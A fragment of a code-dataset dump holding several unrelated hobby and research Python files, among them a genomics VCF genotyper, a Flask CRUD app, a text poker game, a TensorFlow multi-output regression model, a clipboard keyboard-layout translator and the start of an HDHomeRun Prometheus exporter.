gt\n final += \"\\t\"\n return final.rstrip()\n\n \n def get_genotypes_from_pseudosamples(self, chrom, position, info, table):\n \"\"\" Returns genotypes as a string for a specific variant at chrom:position \"\"\"\n gtstring = [\"-\"] * len(self.sampleIds) * 2 # diploid\n gtst, idst = info.split(\":\")\n gts = gtst.split(\"/\")\n ids = idst.split(\",\")\n if len(gts) != len(ids):\n logging.warning(str(gts) + \" and \" + str(ids) + \" are not the same length at \" + str(chrom) + \": \" + str(position))\n return self.get_fullgenotypestring(gtstring)\n for gt, idx in zip(gts,ids):\n s = table[chrom][idx].sampleid\n curra = gtstring[self.samplePos[s]] \n if curra == \"-\":\n gtstring[self.samplePos[s]] = gt\n elif curra == gt:\n logging.warning(str(s) + \" is found multiple times at \" + str(chrom) + \": \" + str(position))\n elif curra == \".\":\n logging.warning(str(s) + \" is already ambigious and there is more data \" + str(gt) + \" at \" + str(chrom) + \": \" + str(position))\n elif curra != str(gt):\n logging.error(str(s) + \" is both \" + curra + \" and \" + str(gt) + \" at \" + str(chrom) + \": \" + str(position))\n gtstring[self.samplePos[s]] = \".\" \n return self.get_fullgenotypestring(gtstring)\n \n \n def get_genotypes_from_overlapping(self, chrom, position, info, table):\n \"\"\" Returns genotypes as a string for a specific variant at chrom:position \"\"\"\n gtstring = [\"-\"] * len(self.sampleIds) * 2 # diploid \n idfields = info.lstrip(\"CONTIG=\").split(\",\") \n for allelenr, ids in enumerate(idfields): \n #print(\"ids: \" + ids) \n if ids == \"-1\": \n continue \n for idx in ids.split(\"/\"): \n s = table[chrom][idx].sampleid \n curra = gtstring[self.samplePos[s]] \n if curra == \"-\": \n gtstring[self.samplePos[s]] = str(allelenr) \n elif curra == str(allelenr): \n logging.warning(str(s) + \" is found multiple times at \" + str(chrom) + \": \" + str(position)) \n elif curra == \".\": \n logging.warning(str(s) + \" is already ambigious and there is more data \" + str(allelenr) + \" at \" + str(chrom) + \": \" + str(position)) \n elif curra != str(allelenr): \n logging.error(str(s) + \" is both \" + curra + \" and \" + str(allelenr) + \" at \" + str(chrom) + \": \" + str(position)) \n gtstring[self.samplePos[s]] = \".\" \n return self.get_fullgenotypestring(gtstring)\n\n\n \n\n# Get utilized referenceIDs and save path to corresponding queryIDs files\nidfiles = {}\nwith open(args.contig_alignment_file) as f:\n for line in f:\n if line.startswith(\"referenceID\"):\n continue\n chrom = line.split()[0]\n ipath = args.qid_prefix + chrom + \".queryIDs\"\n idfiles[ipath] = chrom\n\nidPair = namedtuple('idPair', ['fullid', 'sampleid']) # used to save both the full id and the sampleID\n\n# Get sampleIds\nwith open(args.samples) as f:\n sampleIds = []\n for line in f:\n sampleId = line.rstrip().split()[0]\n sampleIds.append(sampleId)\n\n\n\n# Relate vcf IDs with sample IDs\nids_per_chrom = defaultdict(dict)\nfor idf, chrom in idfiles.items():\n if not path.exists(idf):\n print(\"Could not find \" + str(idf))\n continue\n else:\n with open(idf) as f:\n for line in f:\n fid, vid = line.rstrip().split()\n ids_per_chrom[chrom][vid] = idPair(fid, fid.split(\"_\")[0])\n\ngto = Genotypes(sampleIds, args.samples)\n\n# Add the haplotype information to each variant\nheader = \"\"\nwith open(args.outputfile, 'w+') as outf:\n with open(args.inputfile) as f:\n # First get the header and add sample names\n for line in f:\n if line.startswith('#'):\n header += line\n else:\n sheader = header.split(\"\\n\")\n newinfo = sheader[-2] + \"\\tFORMAT\\t\"+ gto.get_header()\n header = \"\\n\".join(sheader[:-2] + [\"##FORMAT=\", newinfo])\n outf.write(header + \"\\n\")\n #print(line.rstrip())\n break\n # Now add genotype information for each sample and variant\n f.seek(0)\n counter = 0\n for line in f:\n if line.startswith('#'):\n continue\n else:\n counter += 1\n if counter % 10000 == 0:\n print(str(counter) + \" variants changed\", end=\"\\r\")\n sline = line.rstrip().split()\n if sline[6] == \"tainted\":\n logging.warning(\"This variant is tainted: \" + line.rstrip())\n continue\n if args.mode == \"pseudosamples\":\n genotypes = gto.get_genotypes_from_pseudosamples(sline[0],sline[1], sline[9], ids_per_chrom)\n outf.write(\"\\t\".join(line.rstrip().split()[:-2]) + \"\\tGT\\t\" + genotypes + \"\\n\")\n elif args.mode == \"overlapping\":\n genotypes = gto.get_genotypes_from_overlapping(sline[0],sline[1], sline[9], ids_per_chrom)\n outf.write(line.rstrip() + \"\\tGT\\t\" + genotypes + \"\\n\")\n \n","repo_name":"NCBI-Hackathons/NovoGraph","sub_path":"scripts/genotype_vcf.py","file_name":"genotype_vcf.py","file_ext":"py","file_size_in_byte":7749,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"37"} +{"seq_id":"18393890105","text":"# coding: utf-8\n\"\"\"Release data for the abiflows project.\"\"\"\nfrom collections import OrderedDict\n\n# Name of the package for release purposes. This is the name which labels\n# the tarballs and RPMs made by distutils, so it's best to lowercase it.\nname = 'abiflows'\n\n# version information. An empty _version_extra corresponds to a full\n# release. 'dev' as a _version_extra string means this is a development version\n_version_major = 0\n_version_minor = 6\n_version_micro = '' # use '' for first of series, number for 1 and above\n#_version_extra = 'dev'\n_version_extra = '' # Uncomment this for full releases\n\n# Construct full version string from these.\n_ver = [_version_major, _version_minor]\nif _version_micro: _ver.append(_version_micro)\nif _version_extra: _ver.append(_version_extra)\n\n__version__ = '.'.join(map(str, _ver))\n\nversion = __version__ # backwards compatibility name\n\n# The minimum Abinit version compatible with AbiFlows\n#min_abinit_version = \"8.0.8\"\n\ndescription = \"Framework for high-throughput calculations with ABINIT\"\n\nlong_description = \\\n \"\"\"\n The latest development version is always available from site \n \"\"\"\n\nlicense = 'GPL'\n\nauthor = 'The Abinit group'\nauthor_email = 'matteo.giantomassi@uclouvain.be'\nmaintainer = \"Matteo Giantomassi\"\nmaintainer_email = author_email\nauthors = OrderedDict([\n ('Guido', ('G. Petretto', 'nobody@nowhere')),\n ('David', ('D. Waroquiers', 'nobody@nowhere')),\n ('Matteo', ('M. Giantomassi', 'nobody@nowhere')),\n ('Michiel', ('M. J. van Setten', 'nobody@nowhere')),\n])\n\nurl = \"https://github.com/abinit/abiflows\"\ndownload_url = \"https://github.com/abinit/abiflows\"\nplatforms = ['Linux', 'darwin']\nkeywords = [\"ABINIT\", \"ab-initio\", \"density-function-theory\", \"first-principles\", \"electronic-structure\", \"pymatgen\"]\n\nclassifiers = [\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Science/Research\",\n \"License :: OSI Approved :: GNU General Public License v2 (GPLv2)\",\n \"Operating System :: OS Independent\",\n \"Topic :: Scientific/Engineering :: Information Analysis\",\n \"Topic :: Scientific/Engineering :: Physics\",\n \"Topic :: Scientific/Engineering :: Chemistry\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n]\n","repo_name":"abinit/abiflows","sub_path":"abiflows/core/release.py","file_name":"release.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"10583133381","text":"import glob\r\nimport logging\r\nimport os\r\nimport pickle\r\nimport random\r\nimport re\r\nimport shutil\r\nfrom typing import Dict, List, Tuple\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nfrom torch.nn.utils.rnn import pad_sequence\r\nfrom torch.utils.data import DataLoader, Dataset, RandomSampler, SequentialSampler\r\nfrom torch.utils.data.distributed import DistributedSampler\r\nfrom tqdm.notebook import tqdm, trange\r\n\r\nfrom pathlib import Path\r\n\r\nfrom transformers import (\r\n MODEL_WITH_LM_HEAD_MAPPING,\r\n WEIGHTS_NAME,\r\n AdamW,\r\n AutoConfig,\r\n PreTrainedModel,\r\n PreTrainedTokenizer,\r\n get_linear_schedule_with_warmup,\r\n)\r\n\r\ntry:\r\n from torch.utils.tensorboard import SummaryWriter\r\nexcept ImportError:\r\n from tensorboardX import SummaryWriter\r\n\r\ndef readInData():\r\n data = pd.read_csv('theOfficeTranscript.csv', sep=',')\r\n data.sample(6)\r\n CHARACTER_NAME = 'Dwight'\r\n\r\n contexted = []\r\n # context window of size 7\r\n n = 7\r\n\r\n for i in data[data.name == CHARACTER_NAME].index:\r\n if i < n:\r\n continue\r\n row = []\r\n prev = i - 1 - n # we additionally substract 1, so row will contain current responce and 7 previous responces\r\n\r\n for j in range(i, prev, -1):\r\n row.append(data.line[j])\r\n contexted.append(row)\r\n\r\n columns = ['response', 'context']\r\n columns = columns + ['context/' + str(i) for i in range(n - 1)]\r\n\r\n df = pd.DataFrame.from_records(contexted, columns=columns)\r\n\r\n df.sample(6)\r\n\r\n trn_df, val_df = train_test_split(df, test_size=0.1)\r\n trn_df.head()\r\n\r\n # create dataset suitable for our model\r\ndef construct_conv(row, tokenizer, eos = True):\r\n flatten = lambda l: [item for sublist in l for item in sublist]\r\n conv = list(reversed([tokenizer.encode(x) + [tokenizer.eos_token_id] for x in row]))\r\n conv = flatten(conv)\r\n return conv\r\n\r\nclass ConversationDataset(Dataset):\r\n def __init__(self, tokenizer: PreTrainedTokenizer, args, df, block_size=512):\r\n\r\n block_size = block_size - (tokenizer.model_max_length - tokenizer.max_len_single_sentence)\r\n\r\n directory = args.cache_dir\r\n cached_features_file = os.path.join(\r\n directory, args.model_type + \"_cached_lm_\" + str(block_size)\r\n )\r\n\r\n if os.path.exists(cached_features_file) and not args.overwrite_cache:\r\n logger.info(\"Loading features from cached file %s\", cached_features_file)\r\n with open(cached_features_file, \"rb\") as handle:\r\n self.examples = pickle.load(handle)\r\n else:\r\n logger.info(\"Creating features from dataset file at %s\", directory)\r\n\r\n self.examples = []\r\n for _, row in df.iterrows():\r\n conv = construct_conv(row, tokenizer)\r\n self.examples.append(conv)\r\n\r\n logger.info(\"Saving features into cached file %s\", cached_features_file)\r\n with open(cached_features_file, \"wb\") as handle:\r\n pickle.dump(self.examples, handle, protocol=pickle.HIGHEST_PROTOCOL)\r\n\r\n def __len__(self):\r\n return len(self.examples)\r\n\r\n def __getitem__(self, item):\r\n return torch.tensor(self.examples[item], dtype=torch.long)\r\n\r\n# Cacheing and storing of data/checkpoints\r\n\r\ndef load_and_cache_examples(args, tokenizer, df_trn, df_val, evaluate=False):\r\n return ConversationDataset(tokenizer, args, df_val if evaluate else df_trn)\r\n\r\n\r\ndef set_seed(args):\r\n random.seed(args.seed)\r\n np.random.seed(args.seed)\r\n torch.manual_seed(args.seed)\r\n if args.n_gpu > 0:\r\n torch.cuda.manual_seed_all(args.seed)\r\n\r\n\r\ndef _sorted_checkpoints(args, checkpoint_prefix=\"checkpoint\", use_mtime=False) -> List[str]:\r\n ordering_and_checkpoint_path = []\r\n\r\n glob_checkpoints = glob.glob(os.path.join(args.output_dir, \"{}-*\".format(checkpoint_prefix)))\r\n\r\n for path in glob_checkpoints:\r\n if use_mtime:\r\n ordering_and_checkpoint_path.append((os.path.getmtime(path), path))\r\n else:\r\n regex_match = re.match(\".*{}-([0-9]+)\".format(checkpoint_prefix), path)\r\n if regex_match and regex_match.groups():\r\n ordering_and_checkpoint_path.append((int(regex_match.groups()[0]), path))\r\n\r\n checkpoints_sorted = sorted(ordering_and_checkpoint_path)\r\n checkpoints_sorted = [checkpoint[1] for checkpoint in checkpoints_sorted]\r\n return checkpoints_sorted\r\n\r\n\r\ndef _rotate_checkpoints(args, checkpoint_prefix=\"checkpoint\", use_mtime=False) -> None:\r\n if not args.save_total_limit:\r\n return\r\n if args.save_total_limit <= 0:\r\n return\r\n\r\n # Check if we should delete older checkpoint(s)\r\n checkpoints_sorted = _sorted_checkpoints(args, checkpoint_prefix, use_mtime)\r\n if len(checkpoints_sorted) <= args.save_total_limit:\r\n return\r\n\r\n number_of_checkpoints_to_delete = max(0, len(checkpoints_sorted) - args.save_total_limit)\r\n checkpoints_to_be_deleted = checkpoints_sorted[:number_of_checkpoints_to_delete]\r\n for checkpoint in checkpoints_to_be_deleted:\r\n logger.info(\"Deleting older checkpoint [{}] due to args.save_total_limit\".format(checkpoint))\r\n shutil.rmtree(checkpoint)\r\n","repo_name":"reederward1285/theOfficeAI","sub_path":"ai-chatbot.py","file_name":"ai-chatbot.py","file_ext":"py","file_size_in_byte":5257,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70485058668","text":"'''\n5.\tLer duas matrizes A e B, cada uma com uma dimensão para 12 elementos. \nConstruir uma matriz C de duas dimensões, onde a primeira coluna da matriz \nC deverá ser formada pelos elementos da matriz A multiplicados por 2, e a \nsegunda coluna deverá ser formada pelos elementos da matriz B subtraídos de 5.\n'''\n\nLINHAS = 12\n\na = []\nb = []\nc = []\n\n#matriz A\nprint('Entre com os valores para matriz A')\nfor i in range(LINHAS):\n\ta.append(int(input('Entre com um numero: ')))\n\n#matriz B\nprint('Entre com os valores para matriz B')\nfor i in range(LINHAS):\n\tb.append(int(input('Entre com um numero: ')))\n\n#Matriz C\nfor i in range(0,LINHAS):\n linha = []\n linha.append(a[i] * 2)\n linha.append(b[i] - 5)\n c.append(linha)\n\nfor i in c:\n print(i)","repo_name":"carlosfabioa/TDS_exercicios_logica_programacao","sub_path":"6- Matriz com duas dimensoes/05exercicio.py","file_name":"05exercicio.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"3264138345","text":"from flask import Blueprint, render_template, redirect, url_for\n# db import\nfrom apps.app import db\n# User Class import\nfrom apps.crud.models import User\nfrom apps.crud.forms import UserForm\n\n\n#bp = Blueprint('main', __name__, url_prefix='/')\n\n#blueprint로 crud 앱 생성\ncrud = Blueprint(\n \"crud\",\n __name__,\n template_folder=\"templates\",\n static_folder=\"static\",\n)\n\n# index 엔드포인트를 작성하고 index.html 반환\n@crud.route(\"/\")\ndef index():\n return render_template(\"crud/index.html\")\n\n\n@crud.route(\"/sql\")\ndef sql():\n db.session.query(User).get(1)\n return \"콘솔 로그를 확인해 주세요\"\n\n@crud.route(\"/users/new\", methods=[\"GET\", \"POST\"])\ndef create_user():\n # UserForm을 인스턴스화한다.\n form = UserForm()\n # 폼의 값을 검증한다.\n if form.validate_on_submit():\n # 사용자를 작성한다.\n user = User(\n username=form.username.data,\n email=form.email.data,\n passsword=form.password.data,\n )\n \n #사용자를 추가하고 커밋한다.\n db.session.add(user)\n db.session.commit()\n\n #사용자의 일람 화면으로 리다이렉트한다.\n return redirect(url_for(\"crud.users\"))\n return render_template(\"crud/create.html\", form=form)\n\n'''\n@bp.route('/hello')\ndef hello_world():\n return 'hello, world!'\n\n@bp.route('/')\ndef index():\n return 'This is index'\n '''","repo_name":"wooseong-dev/web_flask_shop_Project","sub_path":"apps/crud/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18273353741","text":"# *******************\n# By: Timothy Metzger\n# *******************\n\nimport os\n\n\ndef main():\n \"\"\"Asks user for a base folder name and number of folders they\n wish to create in a user specified directory\n ie Base Folder Name: Homework , Number of Folders: 10 --> Homework 1, Homework 2,..., Homework n \"\"\"\n\n base_name = input(\"Base folder name: \")\n number_folders = int(input(\"Number of folders you wish to create: \"))\n directory = input(\"Directory: \")\n\n directory = directory.replace(\"\\\\\", \"/\")\n print(directory)\n\n if not os.path.exists(directory + \"/\" + base_name + \"s\"):\n os.mkdir(directory + \"/\" + base_name + \"s\")\n\n for i in range(1, number_folders + 1):\n try:\n os.mkdir(directory + \"/\" + base_name + \"s/\" + f'{base_name} {i}')\n except Exception:\n print(Exception)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"timMetzger/pythonScripts","sub_path":"folderCreator.py","file_name":"folderCreator.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"471778399","text":"#!/usr/bin/env python3\n\n\ndef find_reoccurring_character(s):\n track = []\n result = 'No reoccurring characters found'\n\n if not isinstance(s, str):\n return result\n\n for character in s:\n if character in track:\n result = character\n break\n\n track.append(character)\n\n return result\n","repo_name":"ericwegscheid/code-exercises","sub_path":"python/find-first-reoccurring-character/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3692308338","text":"from translator import Translator\nfrom pynput.keyboard import Key, KeyCode, Listener\nimport pyperclip\n\ndef changeLayout():\n\n cb = pyperclip.paste()\n output = Translator().translate(cb)\n pyperclip.copy(output)\n\n\ndef changeCapitalise():\n\n cb = pyperclip.paste()\n output = Translator().change_cap(cb)\n pyperclip.copy(output)\n\n\ncombination_to_function = {\n frozenset([Key.ctrl_l, Key.space]): changeLayout,\n frozenset([Key.ctrl_l, Key.alt_l, Key.space]): changeCapitalise,\n}\n\ncurrent_keys = set()\n\ndef on_press(key):\n current_keys.add(key)\n if frozenset(current_keys) in combination_to_function:\n combination_to_function[frozenset(current_keys)]()\n\ndef on_release(key):\n current_keys.clear()\n\nwith Listener(on_press=on_press, on_release=on_release) as listener:\n listener.join()","repo_name":"StormInside/Fast-layout-translator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28888120797","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom profiles.models import Profile\nfrom django.contrib.auth.decorators import login_required\n\n# Create your views here.\n\n@login_required\ndef get_user_profile(request, username):\n if request.method == 'GET':\n profile = get_object_or_404(Profile, user__username=username)\n # profile = Profile.objects.get(user__username=username)\n context = {\n 'profile': profile,\n }\n return render(request, 'profiles/profile.html', context=context)\n \n@login_required\ndef edit_user_profile(request, username):\n profile = get_object_or_404(Profile, user__username=username)\n context = {\n 'profile': profile,\n }\n if request.method == 'GET':\n if request.user.id == profile.user.id:\n return render(request, 'profiles/edit_profile.html', context=context)\n else:\n return render(request, 'profiles/profile.html', context=context)","repo_name":"SemenchukOleg/git_gr8","sub_path":"MODULE_3/LESSON_02/blogit-project/blogitproject/profiles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10248752867","text":"import random\n\n\nclass Card(object):\n\n def __init__(self, value, suit):\n self.value = value\n self.suit = suit\n\n def show(self):\n print(\"{}{}\".format(self.value, self.suit))\n\n\nclass Deck(object):\n\n def __init__(self):\n self.deck = []\n self.build()\n\n def build(self):\n for s in ['d', 'c', 'h', 's']:\n for v in ['A', 2, 3, 4, 5, 6, 7, 8, 9, 'T', 'J', 'Q', 'K']:\n self.deck.append(Card(v, s))\n\n def shuffle(self):\n for i in range(len(self.deck)-1, 0, -1):\n r = random.randint(0, i)\n self.deck[r], self.deck[i] = self.deck[i], self.deck[r]\n\n def draw(self, number_of_cards):\n self.drawn_cards = []\n for n in range(0, number_of_cards):\n self.drawn_cards.append(self.deck.pop())\n return self.drawn_cards\n\n\nclass Player(object):\n\n def __init__(self, name, hand, stack):\n self.name = name\n self.hand = hand\n self.stack = stack\n self.status = \"in\"\n self.player_bet = 0.0\n\n def show_hand(self):\n print(\"{} has hand:\".format(self.name))\n for c in self.hand:\n c.show()\n\n def show_stack(self):\n print(\"{} has stack: {}bb\".format(self.name, self.stack))\n\n def bet(self):\n\n while not 1 <= self.player_bet <= self.stack:\n try:\n self.player_bet = float(input(\"Enter betsize:\"))\n except ValueError:\n print(\"Enter an integer\")\n\n self.stack = self.stack - self.player_bet\n\n return self.player_bet\n\n def call_bet(self, current_bet):\n\n to_call = current_bet - self.player_bet\n # print(\">>>>> to call =\", to_call)\n\n if self.stack < to_call:\n self.player_bet = self.player_bet + self.stack\n called_amount = self.stack\n self.stack = 0.0\n self.status = 'all in'\n else:\n self.player_bet = current_bet\n self.stack = self.stack - to_call\n called_amount = to_call\n\n return called_amount\n\n def raise_bet(self, current_bet):\n\n if self.stack >= 2*current_bet:\n raise_size = 0\n while not current_bet <= raise_size <= self.stack:\n try:\n betsize = float(input(\"Enter betsize:\"))\n raise_size = betsize - current_bet\n except ValueError:\n print(\"Enter an integer\")\n\n additional_bet = betsize - self.player_bet\n self.stack = self.stack - additional_bet\n self.player_bet = betsize\n\n else:\n additional_bet = self.stack\n self.player_bet = self.player_bet + additional_bet\n self.stack = 0.0\n\n return additional_bet\n\n # def raise_all_in(self, current_bet):\n # self.player_bet = self.stack\n # self.stack = 0\n\n def option_agg(self):\n choice = None\n while choice not in ('c', 'b'):\n print('c to check, b to bet:')\n choice = input()\n if choice == 'c':\n return 0.0\n if choice == 'b':\n return self.bet()\n\n def option_def(self, current_bet):\n choice = None\n while choice not in ('f', 'c', 'r'):\n print('f to fold, c to call, r to raise:')\n choice = input()\n if choice == 'f':\n self.status = 'out'\n return 0.0\n elif choice == 'c':\n return self.call_bet(current_bet)\n elif choice =='r':\n return self.raise_bet(current_bet)\n\n\n\nclass Dealer(object):\n\n def deal(self, num_players):\n\n deck = Deck()\n deck.shuffle()\n\n preflop_all_cards = deck.draw(2 * num_players)\n self.hands = [preflop_all_cards[i:i + 2] for i in range(0, len(preflop_all_cards), 2)]\n\n preflop = {'name': 'Preflop', 'cards': self.hands}\n flop = {'name': 'Flop', 'cards': deck.draw(3)}\n turn = {'name': 'Turn', 'cards': deck.draw(1)}\n river = {'name': 'River', 'cards': deck.draw(1)}\n showdown = {'name': 'Showdown', 'cards': (flop['cards'] + turn['cards'] + river['cards'])}\n\n self.streets = [preflop, flop, turn, river, showdown]\n\n def show_cards(self, street):\n print(\"{}:\".format(street['name']))\n\n for card in street['cards']:\n card.show()\n\n def receive_bet(self, player, round):\n if round.max_bet == 0:\n bet_received = player.option_agg()\n else:\n bet_received = player.option_def(round.max_bet)\n\n if player.stack == 0:\n player.status = 'all in'\n\n return bet_received\n\n def distribute_pot(self, winner):\n winner.stack = winner.stack + potsize\n\n\n\nclass Round(object):\n\n def __init__(self, player_info):\n self.num_active_players = len(player_info)\n self.active_players = []\n self.inactive_players = []\n self.pot = 0\n self.max_bet = 0\n\n def show_stacks(self, active_players):\n for player in active_players:\n print(\"{} has stack {}bb\".format(player.name, player.stack))\n\n def player_action(self, dealer):\n\n for player in self.active_players:\n\n if player.status == 'in' and (player.player_bet == 0 or player.player_bet < self.max_bet):\n\n print(\"Pot is {}bb\".format(self.pot))\n print(\"{}, your option, you have {}bb:\".format(player.name, player.stack))\n\n bet_added_to_pot = dealer.receive_bet(player, round)\n self.pot = self.pot + bet_added_to_pot\n if player.player_bet >= self.max_bet:\n self.max_bet = player.player_bet\n\n print(\"{} bet {}bb\".format(player.name, bet_added_to_pot))\n print(\"{} now has stack {}bb\".format(player.name, player.stack))\n\n for p in range(len(self.active_players) - 1, -1, -1):\n if self.active_players[p].status == 'out':\n self.inactive_players.append(self.active_players.pop(p))\n self.num_active_players -= 1\n elif self.active_players[p].status == 'all in':\n self.num_active_players -= 1\n\n def play_street(self, dealer, street):\n\n self.max_bet = 0\n\n for player in self.active_players:\n player.player_bet = 0\n\n if street['name'] == 'Preflop':\n for player in self.active_players:\n player.show_hand()\n else:\n dealer.show_cards(street)\n\n if street['name'] != 'Showdown':\n self.show_stacks(self.active_players)\n self.player_action(dealer)\n\n# need to allow another loop if there is one player left not all in and has the option to call\n\n while ((not all(player.player_bet == self.active_players[0].player_bet for player in self.active_players))\n and self.num_active_players > 1):\n print(\"looping\")\n self.player_action(dealer)\n\n\n def play(self):\n\n dealer = Dealer()\n dealer.deal(self.num_active_players)\n\n i = 0\n for player in player_info:\n player = Player(player['name'], dealer.hands[i], player['stack'])\n self.active_players.append(player)\n i += 1\n\n for street in dealer.streets:\n\n if self.num_active_players > 1:\n self.play_street(dealer, street)\n\n print(\"Stacks at end of round:\")\n self.show_stacks(self.active_players)\n self.show_stacks(self.inactive_players)\n print(\"Pot size: {}\".format(self.pot))\n\n\n\nplayer1 = {'name': 'Player 1', 'stack': 100}\nplayer2 = {'name': 'Player 2', 'stack': 100}\nplayer3 = {'name': 'Player 3', 'stack': 100}\n\nplayer_info = [player1, player2]\n\nround = Round(player_info)\nround.play()\n","repo_name":"jlambton/pokerbot","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":7803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30180447817","text":"from numpy.core.fromnumeric import transpose\nfrom numpy.lib import utils\nfrom numpy.lib.financial import ipmt\nfrom sklearn import model_selection\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Dense, Input\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.python.autograph.utils.ag_logging import _output_to_stdout\nfrom tensorflow.python.keras.engine.input_layer import InputLayer\n\nfrom utills import format_output, norm, plot_diff\n\n\n# prepare data\n\n# Specify data URI\nURI = './data/ENB2012_data.xlsx'\n\n# Use pandas excel reader\ndf = pd.read_excel(URI)\ndf = df.sample(frac=1).reset_index(drop=True)\n\n# split the data into train and test with 80/20 split\ntrain, test = train_test_split(df, test_size=0.2)\ntrain_stats = train.describe()\n\n\ntrain_stats.pop('Y1')\ntrain_stats.pop('Y2')\ntrain_stats = train_stats.transpose()\n\ntrain_Y = format_output(train)\ntest_Y = format_output(test)\n\n# Normalise the training and test of data\nnorm_train_X = norm(train_stats, train)\nnorm_test_X = norm(train_stats, test)\n\n\n# def building_model():\n\n# Define layers\ninput_layer = Input(shape=(len(train .columns),))\nfirst_dense = Dense(units='128', activation='relu')(input_layer)\nsecond_dense = Dense(units='128', activation='relu')(first_dense)\n\n\n# Y1 output will be fed ditrectly from second layer\ny1_output = Dense(units='1', name='y1_output')(second_dense)\nthird_layer = Dense(units='64', activation='relu')(second_dense)\n\n# Y2 output will be fed ditrectly from third layer\ny2_output = Dense(units='1', name='y2_output')(second_dense)\n\n# defining model\n\nmodel = Model(inputs=input_layer, outputs=[y1_output, y2_output])\n\n\nprint(model.summary())\n\n\n# Configure parameters\n# Specify the optimizer, and compile the model with loss functions for both outputs\noptimizer = tf.keras.optimizers.SGD(lr=0.001)\nmodel.compile(optimizer=optimizer,\n loss={'y1_output': 'mse', 'y2_output': 'mse'},\n metrics={'y1_output': tf.keras.metrics.RootMeanSquaredError(),\n 'y2_output': tf.keras.metrics.RootMeanSquaredError()})\n\n\n# Training the model\nhistory = model.fit(norm_train_X, train_Y, epochs=500,\n batch_size=10, validation_data=(norm_test_X, test_Y))\n\n# evaluate model and plot metrics\n\nloss, Y1_loss, Y2_loss, Y1_rmse, Y2_rmse = model.evaluate(\n x=norm_test_X, y=test_Y)\nprint(\"Loss = {}, Y1_loss = {}, Y1_mse = {}, Y2_loss = {}, Y2_mse = {}\".format(\n loss, Y1_loss, Y1_rmse, Y2_loss, Y2_rmse))\n\n# Plot the loss and mse\nY_pred = model.predict(norm_test_X)\nplot_diff(test_Y[0], Y_pred[0], title='Y1')\nplot_diff(test_Y[1], Y_pred[1], title='Y2')\nplot_metrics(metric_name='y1_output_root_mean_squared_error',\n title='Y1 RMSE', ylim=6)\nplot_metrics(metric_name='y2_output_root_mean_squared_error',\n title='Y2 RMSE', ylim=7)\n","repo_name":"matrxrapture/advanced_tf","sub_path":"multi-output-model.py","file_name":"multi-output-model.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8649079875","text":"\"\"\"Application exporter\"\"\"\n\nimport os\nimport time\nfrom prometheus_client import start_http_server, Gauge, Enum\nimport requests\nimport yaml\nimport codecs\nimport re\nfrom dotenv import load_dotenv, find_dotenv\n\nload_dotenv(find_dotenv())\nclass AppConfig:\n\tdef __init__(self, file):\n\t\ttry:\n\t\t\twith codecs.open(file, encoding=\"utf-8-sig\", mode=\"r\") as f:\n\t\t\t\tsettings = yaml.safe_load(f)\n\t\t\t\tself.__dict__.update(settings)\n\t\texcept yaml.YAMLError as exc:\n\t\t\tprint(exc)\n\t\t# self.metrics = MetricsConfig()\n\nclass TunerConfig:\n\tdef __init__(self, hostname: str, useTls: bool, validateTls: bool):\n\t\tself.hostname = hostname\n\t\tself.useTls = useTls\n\t\tself.validateTls = validateTls\n\nclass MetricsConfig:\n\tdef __init__(self, port: int, pollingInterval: int):\n\t\tself.port = port\n\t\tself.pollingInterval = pollingInterval\n\nclass DeviceSystemInfo:\n\tdef __init__(self, model: str, firmware: str, device_id: str, mac_address: str, ip_address: str, subnet_mask: str):\n\t\tself.model = model\n\t\tself.firmware = firmware\n\t\tself.device_id = device_id\n\t\tself.mac_address = mac_address\n\t\tself.ip_address = ip_address\n\t\tself.subnet_mask = subnet_mask\n\n\nclass HDHomeRunMetrics:\n\t\"\"\"\n\tRepresentation of Prometheus metrics and loop to fetch and transform\n\tapplication metrics into Prometheus metrics.\n\t\"\"\"\n\n\tdef __init__(self, config):\n\t\t\tself.namespace = \"hdhomerun\"\n\t\t\tself.polling_interval_seconds = config.metrics['pollingInterval']\n\t\t\tself.config = config\n\t\t\tself.tuners_available_total = Gauge(namespace=self.namespace, name=f\"tuners_available_total\", documentation=\"Total available tuners\", labelnames=[\"host\"])\n\t\t\tself.channels_available_total = Gauge(namespace=self.namespace, name=f\"channels_available_total\", documentation=\"Total number of channels\", labelnames=[\"host\"])\n\t\t\tself.tuners_in_use = Gauge(namespace=self.namespace, name=f\"tuners_in_use\", documentation=\"Number of tuners currently in use\", 